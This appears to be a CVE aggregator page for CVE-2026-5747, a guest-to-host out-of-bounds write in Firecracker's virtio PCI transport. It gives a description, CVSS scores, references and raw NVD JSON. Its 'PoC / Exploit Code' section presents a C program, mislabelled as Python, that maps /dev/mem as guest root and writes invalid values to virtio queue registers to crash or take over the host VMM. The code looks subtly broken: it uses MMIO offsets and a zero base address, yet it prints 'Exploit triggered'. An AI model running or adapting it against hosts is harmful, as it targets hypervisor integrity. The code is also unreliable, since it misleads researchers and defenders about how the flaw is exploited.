CVE-2026-5747

Description

An out-of-bounds write issue in the virtio PCI transport in Firecracker 1.13.0 through 1.14.3 and 1.15.0 on x86_64 and aarch64 might allow a local guest user with root privileges to crash the Firecracker VMM process or potentially execute arbitrary code on the host via modification of virtio queue configuration registers after device activation. Achieving code execution on the host requires additional preconditions, such as the use of a custom guest kernel or specific snapshot configurations. To remediate this, users should upgrade to Firecracker 1.14.4 or 1.15.1 and later.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Firecracker 1.13.0 - 1.14.3

Firecracker 1.15.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * Conceptual PoC for CVE-2026-5747
 * This code attempts to trigger the out-of-bounds write
 * by modifying virtio queue configuration registers.
 * Requires root privileges within the guest VM.
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>
#include <fcntl.h>

#define VIRTIO_MMIO_QUEUE_SEL 0x030
#define VIRTIO_MMIO_QUEUE_NOTIFY 0x050

// Function to map device memory (simplified)
void* map_device_memory(off_t base_addr) {
    int mem_fd = open("/dev/mem", O_RDWR | O_SYNC);
    if (mem_fd < 0) {
        perror("Failed to open /dev/mem (requires root)");
        return NULL;
    }
    void* mapped = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mem_fd, base_addr);
    close(mem_fd);
    return mapped;
}

int main() {
    printf("[+] Attempting to trigger CVE-2026-5747...\n");
    
    // Assuming the base address of the virtio device (hypervisor specific)
    off_t device_base = 0x00000000; 
    volatile unsigned int* virtio_regs = (unsigned int*)map_device_memory(device_base);
    
    if (!virtio_regs) {
        return -1;
    }

    // Trigger condition: Modify queue configuration after activation
    // This specific sequence attempts to corrupt memory via out-of-bounds write
    printf("[+] Modifying virtio queue registers...\n");
    
    // Writing out of bounds values to queue selection/notify
    virtio_regs[VIRTIO_MMIO_QUEUE_SEL/4] = 0xFFFF; // Invalid queue index
    virtio_regs[VIRTIO_MMIO_QUEUE_NOTIFY/4] = 0xFFFFFFFF; 

    printf("[+] Exploit triggered. Check Host VMM status.\n");
    
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-5747
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-5747
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-5747/
[4] VulDB https://vuldb.com/cve/CVE-2026-5747
[5] https://aws.amazon.com/security/security-bulletins/2026-015-aws/
[6] https://github.com/firecracker-microvm/firecracker/releases/tag/v1.14.4
[7] https://github.com/firecracker-microvm/firecracker/releases/tag/v1.15.1
[8] https://github.com/firecracker-microvm/firecracker/security/advisories/GHSA-776c-mpj7-jm3r

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-5747", "sourceIdentifier": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "published": "2026-04-08T00:16:05.657", "lastModified": "2026-04-20T16:16:49.780", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An out-of-bounds write issue in the virtio PCI transport in Firecracker 1.13.0 through 1.14.3 and 1.15.0 on x86_64 and aarch64 might allow a local guest user with root privileges to crash the Firecracker VMM process or potentially execute arbitrary code on the host via modification of virtio queue configuration registers after device activation. Achieving code execution on the host requires additional preconditions, such as the use of a custom guest kernel or specific snapshot configurations.\n\nTo remediate this, users should upgrade to Firecracker 1.14.4 or 1.15.1 and later."}], "metrics": {"cvssMetricV40": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-369"}, {"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://aws.amazon.com/security/security-bulletins/2026-015-aws/", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}, {"url": "https://github.com/firecracker-microvm/firecracker/releases/tag/v1.14.4", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}, {"url": "https://github.com/firecracker-microvm/firecracker/releases/tag/v1.15.1", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}, {"url": "https://github.com/firecracker-microvm/firecracker/security/advisories/GHSA-776c-mpj7-jm3r", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}]}}